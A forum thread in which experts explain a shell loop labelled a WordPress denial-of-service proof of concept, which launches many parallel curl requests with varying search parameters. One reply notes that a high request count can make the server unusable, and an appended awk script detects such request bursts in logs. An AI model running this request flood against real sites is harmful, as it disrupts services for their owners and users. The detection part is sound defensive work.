Help explain this unix command

Posted on 2011-05-01
Last Modified: 2012-05-11

Can someone please explain the lines below to me:

Wordpress DOS Proof-Of-Concept :
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "http://localhost/s?=$random">  /dev/null 2>&1 &

Thank you
Question by:toyen

    Expert Comment

    The statement creates an "array" of numbers starting at "1" up to the value stored in the variable "requests", using the "seq" utility.

    A "for" loop uses these numbers one by one to store them in the variable "random" to then run a curl command using this variable, like

    curl -A Firefox -o --url "http://localhost/s?=1">  /dev/null 2>&1 &
    curl -A Firefox -o --url "http://localhost/s?=2">  /dev/null 2>&1 &
    curl -A Firefox -o --url "http://localhost/s?=3">  /dev/null 2>&1 &

    The outputs of these curl commands are discarded by redirecting standard output (stdout = "1") as well as standard error (stderr = "2") to the null device.

    The "&" at the end is used to run the curl commands in background, so they will run in parallel.

    The whole construct is missing the important "done" statement at the end (did you forget to post line 4?), and the first line
    starting with "Wordpress ..." will produce an error, because "Wordpress" is not a shell command, afaik.


    Author Comment

    Thanks for your response, woolmilkporc.

    Can you let me know what line 4 should be?

    Also, may I know if this is a command to find a vulnerability in WordPress? Is it possible? I understand WordPress has tough coding.
    Thanks very much

    Accepted Solution

    for random in `seq 1 $requests`; do
    curl -A Firefox -o --url "http://localhost/s?=$random">  /dev/null 2>&1 &

    As for the curl command itself - the statement does nothing other than call the URL http://localhost/ which is the default page of your local machine's webserver, passing it the parameter "s" set to 1,2,3,..., using Firefox as the user agent.

    Do you run a local Wordpress server? Otherwise I could not see which way this curl should be usable to test Wordpress - and even if there were a local Wordpress server, you would only fetch what the server would give you when receiving s=1,2,3.... and I can't tell you whether this could be useful for finding vulnerabilities, sorry!

    By the way, "-o" normally designates an output file whose name seems to be missing here by mistake - correct form should be "-o /path/to/outputfile".

    Expert Comment

    Since it's running in the background, this MIGHT be an attempt to determine how many concurrent connections the App would support.

    As far as vulnerabilities, DOS (Denial Of Service) would be about all it could prove. This would explain the first line of the post.

    "Wordpress DOS Proof-Of-Concept :"   This should probably have a # in column 1 (comment)

    So, if you implement woolmilkporc's recommendations above, and set $requests to a high enough number, you may find that the webserver / app is unusable.
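
The loop discussed in this thread leaves a recognisable trace on the server side: many search-style requests from one client within the same second, sent with the bare user agent string "Firefox". The following is an added example, not part of the original thread, that counts such requests per client per second; it assumes a combined-format access log, and the function names, the threshold and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: report clients that send a burst of search-style requests
# within one second, as seen in a combined-format access log.

THRESHOLD=3   # assumed limit of search requests per client per second

# Constructed sample log lines (not taken from a real server).
sample_log() {
cat <<'EOF'
127.0.0.1 - - [01/May/2011:10:00:01 +0000] "GET /s?=1 HTTP/1.1" 200 512 "-" "Firefox"
127.0.0.1 - - [01/May/2011:10:00:01 +0000] "GET /s?=2 HTTP/1.1" 200 512 "-" "Firefox"
127.0.0.1 - - [01/May/2011:10:00:01 +0000] "GET /s?=3 HTTP/1.1" 200 512 "-" "Firefox"
127.0.0.1 - - [01/May/2011:10:00:01 +0000] "GET /s?=4 HTTP/1.1" 200 512 "-" "Firefox"
192.0.2.10 - - [01/May/2011:10:00:01 +0000] "GET /?s=security HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:4.0) Gecko/20100101 Firefox/4.0"
192.0.2.10 - - [01/May/2011:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:4.0) Gecko/20100101 Firefox/4.0"
127.0.0.1 - - [01/May/2011:10:00:02 +0000] "GET /s?=5 HTTP/1.1" 200 512 "-" "Firefox"
EOF
}

# Reads log lines on stdin; $1 is the per-second threshold.
# Prints: client-ip timestamp request-count bare_ua=<count>
detect_search_burst() {
    awk -v limit="$1" '
    {
        # $1 = client IP, $4 = "[dd/Mon/yyyy:hh:mm:ss", $7 = request target
        # Match the usual search form (?s= or &s=) and the "s?=" form
        # that appears in the command posted in the question.
        if (!(index($7, "?s=") || index($7, "&s=") || index($7, "s?=")))
            next
        key = $1 " " substr($4, 2)      # one bucket per client per second
        count[key]++
        # A user agent that is exactly "Firefox" fills a single field ($12);
        # a real browser sends a longer string that spans several fields.
        if (NF == 12 && $12 == "\"Firefox\"")
            bare[key]++
    }
    END {
        for (k in count)
            if (count[k] >= limit)
                print k, count[k], "bare_ua=" (bare[k] + 0)
    }' | sort
}

sample_log | detect_search_burst "$THRESHOLD"
```

On a real server, replace `sample_log` with the access log file as input and tune the threshold to normal search traffic before acting on the output.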
